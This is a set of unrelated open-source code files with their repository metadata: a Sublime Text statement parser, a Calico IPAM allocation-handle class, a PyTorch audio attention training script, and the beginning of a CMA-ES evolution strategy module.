r'\s*(' +
r'(\(|\[|\{|\)|\]|\})|'
r'(\\?[\w$@]+[?!]?|\$)|' +
# double colon is for not ignoring colon at the end of string (php/python
# conflict)
r'(::|[^\w(){}\[\]])' +
r')\s*'
)
STATEMENT_OPEN = ['(', '{', '[']
STATEMENT_CLOSE = [')', '}', ']']
STATEMENT_DELIMETERS = [';', ':', '"', '\'', '(', ')', '[', ']', '{', '}']
STATEMENT_KEYS = {
False : {# forward
'open': STATEMENT_OPEN,
'close': STATEMENT_CLOSE,
},
True : {# backward
'open': STATEMENT_CLOSE,
'close': STATEMENT_OPEN,
}
}
BRACKETS = {
'(': ')',
'{': '}',
'[': ']',
')': '(',
'}': '{',
']': '[',
}
class State():
def __init__(self, view, region, text, backward, matches, statement):
self.view = view
self.strings = view.find_by_selector('string')
self.backward = backward
self.tokens = []
self.statement = statement
self.set_region(region, text, matches)
def set_region(self, region, text, matches):
self.region = region
self.text = text
self.matches = matches
self.index = 0
if matches != None:
self.last_index = len(matches) - 1
else:
self.last_index = None
def finish(self):
self.set_region(None, None, None)
def is_finished(self):
return self.region == None
def parse(view, point):
point = _shift_point(view, point)
if point == None:
return None
preceding, preceding_statement = _parse(view, point, True)
if len(preceding) == 0:
point = _shift_point_forward(view, point)
following, following_statement = _parse(view, point, False)
if len(following) > 0:
preceding, preceding_statement = _parse(view, following[0][0], True)
else:
point = _shift_point_backward(view, point)
preceding, preceding_statement = _parse(view, point, True)
if len(preceding) > 0:
following, following_statement = _parse(view, preceding[-1][1], False)
else:
following, following_statement = _parse(view, preceding[-1][1], False)
tokens = _join(view, preceding + following)
statement = [preceding_statement[0], following_statement[1]]
return tokens, statement
def _shift_point(view, point):
line = view.line(point)
if view.substr(line).strip() == '':
next_line, _ = _get_next_line(view, False, line)
if next_line == None:
return None
point = next_line.a
scope = view.scope_name(point)
if 'comment' in scope:
point = view.extract_scope(point).a
if 'string' in scope:
for region in view.find_by_selector('string'):
if region.a <= point and point <= region.b:
point = region.a
region = sublime.Region(view.line(point).a, point)
new_line_text = view.substr(region)
last_word = re.search(r'[$@\\]?[\w]+[?!]?(\.|->)?\s*$', new_line_text)
if last_word != None:
point = last_word.start(0) + region.a
return point
def _shift_point_backward(view, point):
region = sublime.Region(max(point - 32, 0), point)
new_line_text = view.substr(region)
last_word = re.search(r'[$@\\]?[\w]+[?!]?(\.|->)?\s*$', new_line_text)
if last_word != None:
point = last_word.start(0) + region.a
return point
def _shift_point_forward(view, point):
region = sublime.Region(point, min(point + 32, view.size()))
new_line_text = view.substr(region)
first_word = re.search(r'^\s*([$@]?[\w]+[?!]?)', new_line_text)
if first_word != None:
point = first_word.start(1) + region.a
else:
first_non_space = re.search(r'\S', new_line_text)
if first_non_space != None:
point = first_non_space.start(0) + region.a
return point
def _join(view, tokens):
if len(tokens) == 0:
return tokens
region = sublime.Region(tokens[0][0], tokens[-1][1])
text = view.substr(region)
index = 0
while index < len(tokens) - 1:
token = tokens[index]
next_token = tokens[index + 1]
delimeter = view.substr(sublime.Region(token[1], next_token[0]))
stripped = delimeter.strip()
join_required = (
delimeter == '' or
stripped == '::' or
stripped == '\\' or
stripped == '->' or (
stripped == '.' and (delimeter[0] == '.' or delimeter[-1] == '.')
)
)
if join_required:
tokens[index : index + 2] = [[token[0], next_token[1]]]
else:
index += 1
return tokens
def _parse(view, point, backward):
state = _create_initial_state(view, point, backward)
while True:
if state.is_finished():
break
if len(state.matches) == 0:
_advance(state)
continue
if _process_scope(state):
continue
if _process_nesting(state):
continue
match = state.matches[state.index]
scope_name = state.view.scope_name(match.start(1) + state.region.a)
if 'source' not in scope_name:
state.finish()
continue
_expand_statement(state)
if match.start(3) != -1:
token = [match.start(3) + state.region.a, match.end(3) + state.region.a]
first_char = match.group(3)[0]
is_token = (first_char == '@' or
first_char == '$' or (
'control' not in scope_name and
'operator' not in scope_name and
'storage' not in scope_name
))
if is_token:
state.tokens.append(token)
_advance(state)
if backward:
if len(state.tokens) > 0 and state.statement[1] > state.tokens[-1][0]:
state.statement[1] = state.tokens[-1][0]
state.tokens = list(reversed(state.tokens))
state.statement = list(reversed(state.statement))
else:
if len(state.tokens) > 0 and state.statement[1] < state.tokens[-1][1]:
state.statement[1] = state.tokens[-1][1]
return state.tokens, state.statement
def _expand_statement(state):
match = state.matches[state.index]
if match.group(1) == None:
return
close = STATEMENT_KEYS[state.backward]['close']
word = match.group(1).strip()
if word != '' and word not in close:
if state.backward:
state.statement[1] = state.region.a + match.start(1)
else:
state.statement[1] = state.region.a + match.end(1)
def _create_initial_state(view, point, backward):
region, text = _get_region_by_point(view, point, backward)
matches = _get_matches(text, backward, PATTERN)
state = State(view, region, text, backward, matches, [point, point])
return state
def _process_scope(state):
match = state.matches[state.index]
point = match.start(1) + state.region.a
scope_name = state.view.scope_name(point)
if ' string' in scope_name:
string = None
for region in state.strings:
if region.contains(point):
string = region
break
if string == None:
string = state.view.extract_scope(point)
state.tokens.append([string.a, string.b])
_ignore_region(state, string)
return True
elif 'comment' in scope_name:
region = state.view.extract_scope(point)
_ignore_region(state, region)
return True
return False
def _process_nesting(state):
# ruby block call hack
if _is_ruby_block(state):
return True
match = state.matches[state.index]
if match.start(2) == -1:
return False
keychars = STATEMENT_KEYS[state.backward]
if match.group(2) in keychars['close']:
state.finish()
return True
region = _get_nesting_region(state, match.group(2))
state.tokens.append([region.a, region.b])
_ignore_region(state, region)
return True
def _is_ruby_block(state):
match = state.matches[state.index]
if match.group(4) != '|':
return False
if state.backward:
operator = re.search(r'{\s*(\|)', state.text)
if operator != None and operator.start(1) == match.start(4):
state.finish()
return True
operator = re.search(r',\s*\w+\s*(\|)\s*$', state.text)
if operator != None and operator.start(1) == match.start(4):
state.finish()
return True
else:
operator = re.search(r',\s*\w+\s*(\|)\s*$', state.text)
if operator != None and operator.start(1) == match.start(4):
state.finish()
return True
return False
def _get_nesting_region(state, bracket):
nesting = 1
pattern = re.compile(re.escape(bracket) + '|' + re.escape(BRACKETS[bracket]))
point = state.region.a
if state.backward:
point += state.matches[state.index].start(2)
else:
point += state.matches[state.index].end(2)
region, text = _get_region_by_point(state.view, point, state.backward)
shift = region.a
matches = _get_matches(text, state.backward, pattern)
while True:
for match in matches:
scope_name = state.view.scope_name(match.start(0) + shift)
if ' string' in scope_name or ' comment' in scope_name:
continue
if match.group(0) == bracket:
nesting += 1
continue
nesting -= 1
if nesting == 0:
if state.backward:
end = state.matches[state.index].end(2) + state.region.a
start = match.start(0) + shift
else:
start = state.matches[state.index].start(2) + state.region.a
end = match.end(0) + shift
return sublime.Region(start, end)
region, text = _get_next_line(state.view, state.backward, region)
if region == None:
if state.backward:
return sublime.Region(0, point)
else:
return sublime.Region(point, state.view.size())
shift = region.a
matches = _get_matches(text, state.backward, pattern)
def _ignore_region(state, region):
point = None
if state.backward:
if region.a < state.region.a:
point = region.a
else:
if region.b > state.region.b:
point = region.b
if point != None:
region, text = _get_region_by_point(state.view, point, state.backward)
matches = _get_matches(text, state.backward, PATTERN)
state.set_region(region, text, matches)
else:
begin, end = region.begin(), region.end()
while True:
_advance(state)
if state.is_finished():
return
token_point = state.region.a + state.matches[state.index].start(1)
if token_point <= begin or end <= token_point:
if state.backward:
_advance(state)
break
def _advance(state):
if state.index == state.last_index or len(state.matches) == 0:
_parse_next_region(state)
else:
state.index += 1
def _get_region_by_point(view, point, backward):
line = view.line(point)
if backward:
region = sublime.Region(line.a, point)
else:
region = sublime.Region(point, line.b)
return region, view.substr(region)
def _parse_next_region(state):
region, text = _get_next_line(state.view, state.backward, state.region)
if region == None:
state.finish()
return
matches = _get_matches(text, state.backward, PATTERN)
if _is_statement_end_found(state, region, matches):
state.finish()
else:
state.set_region(region, text, matches)
def _is_statement_end_found(state, region, matches):
if _get_lines_delimeter(state, matches) != '':
return False
match = len(matches) > 0 and matches[0] or None
state_match = len(state.matches) > 0 and state.matches[-1] or None
is_operator = ((
match != None and
match.start(3) != -1 and
'operator' in state.view.scope_name(region.a + match.start(3)) and
match.group(3) != '$' # $ is not operator (js case); sublime, even don't think about it
) or (
state_match != None and
state_match.start(3) != -1 and
'operator' in state.view.scope_name(state.region.a +
state_match.start(3)) and
state_match.group(3) != '$' # $ is not operator (js case); sublime, even don't think about it
))
if is_operator:
return False
return True
def _get_lines_delimeter(state, next_matches):
delimeter = ''
current = len(state.matches) > 0 and state.matches[-1].group(4) or None
if current != None:
current = current.strip()
append = True
if state.backward and current == '\\':
append = False
if current in STATEMENT_DELIMETERS:
append = False
if append:
delimeter += current
following = len(next_matches) > 0 and next_matches[0].group(4) or None
if following != None:
following = following.strip()
if following not in STATEMENT_DELIMETERS:
delimeter += following
return delimeter
def _get_next_line(view, backward, line):
result, text = _get_next_line_info(view, backward, line)
while True:
if result == None:
break
point = line.a + len(text) - len(text.lstrip())
stripped = text.strip()
is_comment_line = (
'comment' in view.scope_name(point) and
view.extract_scope(point).size() == len(stripped)
)
if text != None and stripped != '' and not is_comment_line:
break
result, text = _get_next_line_info(view, backward, result)
return result, text
def _get_next_line_info(view, backward, line):
if backward:
if line.a == 0:
return None, None
line = view.line(line.a - 1)
else:
if line.b == view.size():
return None, None
line = view.line(line.b + 1)
is_full_coment = (
'comment' in view.scope_name(line.a) and
view.extract_scope(line.a).contains(line)
)
if is_full_coment:
return None, None
text = view.substr(line)
return line, text
def _get_matches(text, backward, pattern):
matches = list(re.finditer(pattern, text))
if backward:
matches = list(reversed(matches))
return matches | {
"content_hash": "558176edeb452608bcf2eed6f086065f",
"timestamp": "",
"source": "github",
"line_count": 509,
"max_line_length": 97,
"avg_line_length": 26.18664047151277,
"alnum_prop": 0.6171505739365294,
"repo_name": "shagabutdinov/sublime-statement",
"id": "dc595e4427cc37fee37be84be087a042afe070f9",
"size": "13329",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "parser.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "33432"
}
],
"symlink_target": ""
} |
from netaddr import IPNetwork
import json
import logging
from pycalico import PyCalicoError
_log = logging.getLogger(__name__)
_log.addHandler(logging.NullHandler())
class AllocationHandle(object):
"""
An allocation handle tracks the blocks and number of addresses allocated
with a particular handle ID. This allows fast releasing of those IPs
using the handle ID.
"""
HANDLE_ID = "id"
BLOCK = "block"
def __init__(self, handle_id):
"""
:param handle_id: The ID for this handle, must be a string.
:return: AllocationHandle
"""
self.handle_id = handle_id
self.db_result = None
self.block = {}
"""
Stores the number of allocated addresses, by block CIDR.
"""
def to_json(self):
"""
Convert to a JSON representation for writing to etcd.
"""
json_dict = {AllocationHandle.HANDLE_ID: self.handle_id,
AllocationHandle.BLOCK: self.block}
return json.dumps(json_dict)
@classmethod
def from_etcd_result(cls, etcd_result):
"""
Convert a JSON representation into an instance of AllocationHandle.
"""
json_dict = json.loads(etcd_result.value)
handle_id = json_dict[AllocationHandle.HANDLE_ID]
handle = cls(handle_id)
handle.db_result = etcd_result
block = json_dict[AllocationHandle.BLOCK]
handle.block = block
return handle
def update_result(self):
"""
Return the EtcdResult with any changes to the object written to
result.value.
:return:
"""
self.db_result.value = self.to_json()
return self.db_result
def increment_block(self, block_cidr, num):
"""
Increment the address count for the given block.
:param block_cidr: Block ID as IPNetwork in CIDR format.
:param num: Amount to increment
:return: New count
"""
assert isinstance(block_cidr, IPNetwork)
block_id = str(block_cidr)
cur = self.block.get(block_id, 0)
new = cur + num
self.block[block_id] = new
return new
def decrement_block(self, block_cidr, num):
"""
Decrement the address count for the given block.
:param block_cidr: Block ID as IPNetwork in CIDR format.
:param num: Amount to decrement
:return: New count
"""
assert isinstance(block_cidr, IPNetwork)
block_id = str(block_cidr)
try:
cur = self.block[block_id]
except KeyError:
raise AddressCountTooLow("Tried to decrement block %s by %s, but "
"it isn't linked to handle %s" %
(block_id, num, self.handle_id))
else:
new = cur - num
if new < 0:
raise AddressCountTooLow("Tried to decrement block %s by %s, "
"but it only has %s addresses on"
" handle %s" % (block_id, num, cur,
self.handle_id))
if new == 0:
del self.block[block_id]
else:
self.block[block_id] = new
return new
def is_empty(self):
"""
Return True if there are no allocations, False otherwise.
"""
return len(self.block) == 0
class HandleError(PyCalicoError):
"""
Base error class for IPAM AllocationHandles.
"""
pass
class AddressCountTooLow(HandleError):
"""
Tried to decrement the address count for a block, but it was too low to
decrement without going below zero.
"""
pass
| {
"content_hash": "ff7cd90d2164a4406254eead9b84a1d3",
"timestamp": "",
"source": "github",
"line_count": 130,
"max_line_length": 78,
"avg_line_length": 29.276923076923076,
"alnum_prop": 0.5559642669469259,
"repo_name": "caseydavenport/libcalico",
"id": "891989670e7a144f2c8108cbce2055e06789bbfb",
"size": "4414",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "calico_containers/pycalico/handle.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "2226"
},
{
"name": "Python",
"bytes": "499979"
}
],
"symlink_target": ""
} |
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.optim import lr_scheduler
import torch.utils.data as data
from torch.nn.utils.rnn import pack_padded_sequence as pack, pad_packed_sequence as unpack
import torchaudio
import torchaudio.transforms as tat
import numpy as np
import os
import glob
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from pytorch_audio_utils import *
parser = argparse.ArgumentParser(description='PyTorch Language ID Classifier Trainer')
parser.add_argument('--epochs', type=int, default=5,
help='upper epoch limit')
parser.add_argument('--batch-size', type=int, default=6,
help='batch size')
parser.add_argument('--window-size', type=int, default=200,
help='size of fft window')
parser.add_argument('--validate', action='store_true',
help='do out-of-bag validation')
parser.add_argument('--log-interval', type=int, default=5,
help='reports per epoch')
parser.add_argument('--load-model', type=str, default=None,
help='path of model to load')
parser.add_argument('--save-model', action='store_true',
help='path to save the final model')
parser.add_argument('--train-full-model', action='store_true',
help='train full model vs. final layer')
args = parser.parse_args()
class Preemphasis(object):
"""Perform preemphasis on signal
y = x[n] - α*x[n-1]
Args:
alpha (float): preemphasis coefficient
"""
def __init__(self, alpha=0.97):
self.alpha = alpha
def __call__(self, sig):
"""
Args:
sig (Tensor): Tensor of audio of size (Samples x Channels)
Returns:
sig (Tensor): Preemphasized. See equation above.
"""
if self.alpha == 0:
return sig
else:
sig[1:, :] -= self.alpha * sig[:-1, :]
return sig
class RfftPow(object):
"""This function emulates power of the discrete fourier transform.
Note: this implementation may not be numerically stable
Args:
K (int): number of fft freq bands
"""
def __init__(self, K=None):
self.K = K
def __call__(self, sig):
"""
Args:
sig (Tensor): Tensor of audio of size (Samples x Channels)
Returns:
S (Tensor): spectrogram
"""
N = sig.size(1)
if self.K is None:
K = N
else:
K = self.K
k_vec = torch.arange(0, K).unsqueeze(0)
n_vec = torch.arange(0, N).unsqueeze(1)
angular_pt = 2 * np.pi * k_vec * n_vec / K
S = torch.sqrt(torch.matmul(sig, angular_pt.cos())**2 + \
torch.matmul(sig, angular_pt.sin())**2)
S = S.squeeze()[:(K//2+1)]
S = (1 / K) * S**2
return S
class FilterBanks(object):
"""Bins a periodogram from K fft frequency bands into N bins (banks)
fft bands (K//2+1) -> filterbanks (n_filterbanks) -> bins (bins)
Args:
n_filterbanks (int): number of filterbanks
bins (list): number of bins
"""
def __init__(self, n_filterbanks, bins):
self.n_filterbanks = n_filterbanks
self.bins = bins
def __call__(self, S):
"""
Args:
S (Tensor): Tensor of Spectro- / Periodogram
Returns:
fb (Tensor): binned filterbanked spectrogram
"""
conversion_factor = np.log(10) # torch.log10 doesn't exist
K = S.size(0)
fb_mat = torch.zeros((self.n_filterbanks, K))
for m in range(1, self.n_filterbanks+1):
f_m_minus = int(self.bins[m - 1])
f_m = int(self.bins[m])
f_m_plus = int(self.bins[m + 1])
fb_mat[m - 1, f_m_minus:f_m] = (torch.arange(f_m_minus, f_m) - f_m_minus) / (f_m - f_m_minus)
fb_mat[m - 1, f_m:f_m_plus] = (f_m_plus - torch.arange(f_m, f_m_plus)) / (f_m_plus - f_m)
fb = torch.matmul(S, fb_mat.t())
fb = 20 * torch.log(fb) / conversion_factor
return fb
class MFCC(object):
"""Discrete Cosine Transform
There are three types of the DCT. This is 'Type 2' as described in the scipy docs.
filterbank bins (bins) -> mfcc (mfcc)
Args:
n_filterbanks (int): number of filterbanks
n_coeffs (int): number of mfc coefficients to keep
mode (str): orthogonal transformation
"""
def __init__(self, n_filterbanks, n_coeffs, mode="ortho"):
self.n_filterbanks = n_filterbanks
self.n_coeffs = n_coeffs
self.mode = "ortho"
def __call__(self, fb):
"""
Args:
fb (Tensor): Tensor of binned filterbanked spectrogram
Returns:
mfcc (Tensor): Tensor of mfcc coefficients
"""
K = self.n_filterbanks
k_vec = torch.arange(0, K).unsqueeze(0)
n_vec = torch.arange(0, self.n_filterbanks).unsqueeze(1)
angular_pt = np.pi * k_vec * ((2*n_vec+1) / (2*K))
mfcc = 2 * torch.matmul(fb, angular_pt.cos())
if self.mode == "ortho":
mfcc[0] *= np.sqrt(1/(4*self.n_filterbanks))
mfcc[1:] *= np.sqrt(1/(2*self.n_filterbanks))
return mfcc[1:(self.n_coeffs+1)]
class Sig2Features(object):
"""Get the log power, MFCCs and 1st derivatives of the signal across n hops
and concatenate all that together
Args:
n_hops (int): number of filterbanks
transformDict (dict): dict of transformations for each hop
"""
def __init__(self, ws, hs, transformDict):
self.ws = ws
self.hs = hs
self.td = transformDict
def __call__(self, sig):
"""
Args:
sig (Tensor): Tensor of signal
Returns:
Feats (Tensor): Tensor of log-power, 12 mfcc coefficients and 1st devs
"""
n_hops = (sig.size(0) - ws) // hs
P = []
Mfcc = []
for i in range(n_hops):
# create frame
st = int(i * hs)
end = st + ws
sig_n = sig[st:end]
# get power/energy
P += [self.td["RfftPow"](sig_n.transpose(0, 1))]
# get mfccs and filter banks
fb = self.td["FilterBanks"](P[-1])
Mfcc += [self.td["MFCC"](fb)]
# concat and calculate derivatives
P = torch.stack(P, 1)
P_sum = torch.log(P.sum(0))
P_dev = torch.zeros(P_sum.size())
P_dev[1:] = P_sum[1:] - P_sum[:-1]
Mfcc = torch.stack(Mfcc, 1)
Mfcc_dev = torch.cat((torch.zeros(n_coefficients, 1), Mfcc[:,:-1] - Mfcc[:,1:]), 1)
Feats = torch.cat((P_sum.unsqueeze(0), P_dev.unsqueeze(0), Mfcc, Mfcc_dev), 0)
return Feats
class Labeler(object):
"""Labels from text to int + 1
"""
def __call__(self, labels):
return torch.LongTensor([int(l)+1 for l in labels])
def pad_packed_collate(batch):
"""Puts data, and lengths into a packed_padded_sequence then returns
the packed_padded_sequence and the labels. Set use_lengths to True
to use this collate function.
Args:
batch: (list of tuples) [(audio, target)].
audio is a FloatTensor
target is a LongTensor with a length of 8
Output:
packed_batch: (PackedSequence), see torch.nn.utils.rnn.pack_padded_sequence
labels: (Tensor), labels from the file names of the wav.
"""
if len(batch) == 1:
sigs, labels = batch[0][0], batch[0][1]
sigs = sigs.t()
lengths = [sigs.size(0)]
sigs.unsqueeze_(0)
labels.unsqueeze_(0)
if len(batch) > 1:
sigs, labels, lengths = zip(*[(a.t(), b, a.size(1)) for (a,b) in sorted(batch, key=lambda x: x[0].size(1), reverse=True)])
max_len, n_feats = sigs[0].size()
sigs = [torch.cat((s, torch.zeros(max_len - s.size(0), n_feats)), 0) if s.size(0) != max_len else s for s in sigs]
sigs = torch.stack(sigs, 0)
labels = torch.stack(labels, 0)
packed_batch = pack(Variable(sigs), lengths, batch_first=True)
return packed_batch, labels
def unpack_lengths(batch_sizes):
"""taken directly from pad_packed_sequence()
"""
lengths = []
data_offset = 0
prev_batch_size = batch_sizes[0]
for i, batch_size in enumerate(batch_sizes):
dec = prev_batch_size - batch_size
if dec > 0:
lengths.extend((i,) * dec)
prev_batch_size = batch_size
lengths.extend((i + 1,) * batch_size)
lengths.reverse()
return lengths
class EncoderRNN2(nn.Module):
def __init__(self, input_size, hidden_size, n_layers=1, batch_size=1):
super(EncoderRNN2, self).__init__()
self.n_layers = n_layers
self.hidden_size = hidden_size
self.batch_size = batch_size
self.gru = nn.GRU(input_size, hidden_size, n_layers, batch_first=True)
def forward(self, input, hidden):
output = input
output, hidden = self.gru(output, hidden)
#print("encoder:", output.size(), hidden.size())
return output, hidden
def initHidden(self, ttype=None):
if ttype == None:
ttype = torch.FloatTensor
result = Variable(ttype(self.n_layers * 1, self.batch_size, self.hidden_size).fill_(0))
if use_cuda:
return result.cuda()
else:
return result
class Attn(nn.Module):
def __init__(self, hidden_size, batch_size=1, method="dot"):
super(Attn, self).__init__()
self.method = method
self.hidden_size = hidden_size
self.batch_size = batch_size
if self.method == 'general':
self.attn = nn.Linear(self.hidden_size, hidden_size, bias=False)
elif self.method == 'concat':
self.attn = nn.Linear(self.hidden_size * 2, hidden_size, bias=False)
self.v = nn.Parameter(torch.FloatTensor(batch_size, 1, hidden_size))
def forward(self, hidden, encoder_outputs):
max_len = encoder_outputs.size(1)
# get attn energies in one batch
attn_energies = self.score(hidden, encoder_outputs)
# Normalize energies to weights in range 0 to 1
return F.softmax(attn_energies)
def score(self, hidden, encoder_output):
#print("attn.score:", hidden.size(), encoder_output.size())
if self.method == 'general':
energy = self.attn(encoder_output)
energy = energy.transpose(2, 1)
energy = hidden.bmm(energy)
return energy
elif self.method == 'concat':
hidden = hidden * Variable(encoder_output.data.new(encoder_output.size()).fill_(1)) # broadcast hidden to encoder_outputs size
energy = self.attn(torch.cat((hidden, encoder_output), -1))
energy = energy.transpose(2, 1)
energy = self.v.bmm(energy)
return energy
else:
#self.method == 'dot':
encoder_output = encoder_output.transpose(2, 1)
energy = hidden.bmm(encoder_output)
return energy
class LuongAttnDecoderRNN(nn.Module):
def __init__(self, hidden_size, output_size, attn_model="dot", n_layers=1, dropout=0.1, batch_size=1):
super(LuongAttnDecoderRNN, self).__init__()
# Keep for reference
self.attn_model = attn_model
self.hidden_size = hidden_size
self.output_size = output_size
self.n_layers = n_layers
self.dropout = dropout
self.batch_size = batch_size
# Define layers
self.gru = nn.GRU(hidden_size, hidden_size, n_layers, dropout=dropout, batch_first=True)
self.concat = nn.Linear(hidden_size * 2, hidden_size)
self.out = nn.Linear(hidden_size, output_size)
# Choose attention model
if attn_model != 'none':
self.attn = Attn(hidden_size, method=attn_model, batch_size=batch_size)
def forward(self, input_seq, last_hidden, encoder_outputs):
# Note: This now runs in batch but was originally run one
# step at a time
# B = batch size
# S = output length
# N = # of hidden features
# Get the embedding of the current input word (last output word)
batch_size = input_seq.size(0)
# Get current hidden state from input word and last hidden state
rnn_output, hidden = self.gru(input_seq, last_hidden)
# Calculate attention from current RNN state and all encoder outputs;
# apply to encoder outputs to get weighted average
#print("decoder:", rnn_output.size(), encoder_outputs.size())
attn_weights = self.attn(rnn_output, encoder_outputs)
context = attn_weights.bmm(encoder_outputs) # [B, S, L] dot [B, L, N] -> [B, S, N]
print(attn_weights.size(), encoder_outputs.size(), context.size())
#print("decoder context:", context.size())
# Attentional vector using the RNN hidden state and context vector
# concatenated together (Luong eq. 5)
concat_input = torch.cat((rnn_output, context), -1) # B x S x 2*N
concat_output = F.tanh(self.concat(concat_input))
# Finally predict next token (Luong eq. 6, without softmax)
output = self.out(concat_output)
# Return final output, hidden state, and attention weights (for visualization)
return output, hidden, attn_weights
# train parameters
epochs = args.epochs
# set dataset parameters
DATADIR = "/home/david/Programming/data"
sr = 8000
ws = args.window_size
hs = ws // 2
n_fft = 512 # 256
n_filterbanks = 26
n_coefficients = 12
low_mel_freq = 0
high_freq_mel = (2595 * np.log10(1 + (sr/2) / 700))
mel_pts = np.linspace(low_mel_freq, high_freq_mel, n_filterbanks + 2)
hz_pts = np.floor(700 * (10**(mel_pts / 2595) - 1))
bins = np.floor((n_fft + 1) * hz_pts / sr)
# data transformations
td = {
"RfftPow": RfftPow(n_fft),
"FilterBanks": FilterBanks(n_filterbanks, bins),
"MFCC": MFCC(n_filterbanks, n_coefficients),
}
transforms = tat.Compose([
tat.Scale(),
tat.PadTrim(58000, fill_value=1e-8),
Preemphasis(),
Sig2Features(ws, hs, td),
])
# set network parameters
use_cuda = torch.cuda.is_available()
batch_size = args.batch_size
input_features = 26
hidden_size = 100
output_size = 3
#output_length = (8 + 7 + 2) # with "blanks"
output_length = 8 # without blanks
n_layers = 1
attn_modus = "dot"
# build networks, criterion, optimizers, dataset and dataloader
encoder2 = EncoderRNN2(input_features, hidden_size, n_layers=n_layers, batch_size=batch_size)
decoder2 = LuongAttnDecoderRNN(hidden_size, output_size, n_layers=n_layers, attn_model=attn_modus, batch_size=batch_size)
print(encoder2)
print(decoder2)
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.RMSprop([
{"params": encoder2.parameters()},
{"params": decoder2.parameters(), "lr": 0.0001}
], lr=0.001, momentum=0.9)
scheduler = lr_scheduler.StepLR(optimizer, step_size=80, gamma=0.6)
ds = torchaudio.datasets.YESNO(DATADIR, transform=transforms, target_transform=Labeler())
dl = data.DataLoader(ds, batch_size=batch_size)
if use_cuda:
print("using CUDA: {}".format(use_cuda))
encoder2 = encoder2.cuda()
decoder2 = decoder2.cuda()
loss_total = []
# begin training
for epoch in range(epochs):
scheduler.step()
print("epoch {}".format(epoch+1))
running_loss = 0
loss_epoch = []
for i, (mb, tgts) in enumerate(dl):
# set model into train mode and clear gradients
encoder2.train()
decoder2.train()
encoder2.zero_grad()
decoder2.zero_grad()
# set inputs and targets
mb = mb.transpose(2, 1) # [B x N x L] -> [B, L, N]
if use_cuda:
mb, tgts = mb.cuda(), tgts.cuda()
mb, tgts = Variable(mb), Variable(tgts)
encoder2_hidden = encoder2.initHidden(type(mb.data))
encoder2_output, encoder2_hidden = encoder2(mb, encoder2_hidden)
#print(encoder2_output)
# Prepare input and output variables for decoder
dec_i = Variable(encoder2_output.data.new([[[0] * hidden_size] * output_length] * batch_size))
dec_h = encoder2_hidden # Use last (forward) hidden state from encoder
#print(dec_h.size())
"""
# Run through decoder one time step at a time
# collect attentions
attentions = []
outputs = []
dec_i = Variable(torch.FloatTensor([[[0] * hidden_size] * 1]))
target_seq = Variable(torch.FloatTensor([[[-1] * hidden_size]*8]))
for t in range(output_length):
#print("t:", t, dec_i.size())
dec_o, dec_h, dec_attn = decoder2(
dec_i, dec_h, encoder2_output
)
#print("decoder output", dec_o.size())
dec_i = target_seq[:,t].unsqueeze(1) # Next input is current target
outputs += [dec_o]
attentions += [dec_attn]
dec_o = torch.cat(outputs, 1)
dec_attn = torch.cat(attentions, 1)
"""
# run through decoder in one shot
dec_o, dec_h, dec_attn = decoder2(dec_i, dec_h, encoder2_output)
# calculate loss and backprop
loss = criterion(dec_o.view(-1, output_size), tgts.view(-1))
running_loss += loss.data[0]
loss_epoch += [loss.data[0]]
loss.backward()
#nn.utils.clip_grad_norm(encoder2.parameters(), 0.05)
#nn.utils.clip_grad_norm(decoder2.parameters(), 0.05)
optimizer.step()
# logging stuff
if (i % args.log_interval == 0 and i != 0) or epoch == 0:
print(loss.data[0])
loss_total += [loss_epoch]
print((dec_o.max(2)[1].data == tgts.data).float().sum(1) / tgts.size(1))
print("ave loss of {} at epoch {}".format(running_loss / (i+1), epoch+1))
loss_total = np.array(loss_total)
plt.figure()
plt.plot(loss_total.mean(1))
plt.savefig("pytorch_attention_audio-loss.png")
# Set up figure with colorbar
attn_plot = dec_attn[0, :, :].data
attn_plot = attn_plot.numpy() if not use_cuda else attn_plot.cpu().numpy()
fig = plt.figure(figsize=(20, 6))
ax = fig.add_subplot(111)
cax = ax.matshow(attn_plot, cmap='bone', aspect="auto")
fig.colorbar(cax)
fig.savefig("pytorch_attention_audio-attention.png")
| {
"content_hash": "13c93cf7ddbf8ee3ac87d89b77be4f0b",
"timestamp": "",
"source": "github",
"line_count": 551,
"max_line_length": 138,
"avg_line_length": 33.524500907441016,
"alnum_prop": 0.5889995669120831,
"repo_name": "dhpollack/programming_notebooks",
"id": "978b011b224012b04df51bc99977125c401506f7",
"size": "18473",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pytorch_attention_audio.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "4736"
},
{
"name": "CMake",
"bytes": "228"
},
{
"name": "Jupyter Notebook",
"bytes": "22640441"
},
{
"name": "Python",
"bytes": "21946"
}
],
"symlink_target": ""
} |
"""A module that provides support for the Covariance Matrix Adaptation
Evolution Strategy.
"""
import copy
import logging
import math
import numpy
import random # Only used to seed numpy.random
import sys # Used to get maxint
numpy.random.seed(random.randint(0, sys.maxint))
_logger = logging.getLogger("eap.cma")
def esCMA(toolbox, population, sigma, ngen, halloffame=None, **kargs):
"""The CMA-ES algorithm as described in Hansen, N. (2006). *The CMA
Evolution Strategy: A Comparing Rewiew.*
The provided *population* should be a list of one or more individuals. The
other keyworded arguments are passed to the class
:class:`~eap.cma.CMAStrategy`.
"""
_logger.info("Start of evolution")
strategy = CMAStrategy(population, sigma, kargs) # Initialize the strategy
for g in xrange(ngen):
_logger.info("Evolving generation %i", g)
# Replace the whole population with the generated individuals from the
# cma strategy
population[:] = strategy.generate()
# Evaluate the individuals
for ind in population:
ind.fitness.values = toolbox.evaluate(ind)
if halloffame is not None:
halloffame.update(population)
# Update the Strategy with the evaluated individuals
strategy.update(population)
# Gather all the fitnesses in one list and print the stats
fits = [ind.fitness.values[0] for ind in population]
length = len(population)
mean = sum(fits) / length
sum2 = sum(fit**2 for fit in fits)
std_dev = abs(sum2 / length - mean**2)**0.5
_logger.debug("Min %f", min(fits))
_logger.debug("Max %f", max(fits))
_logger.debug("Mean %f", mean)
_logger.debug("Std. Dev. %f", std_dev)
_logger.info("End of (successful) evolution")
class CMAStrategy(object):
"""
Additional configuration may be passed throught the *params* argument as a
dictionary,
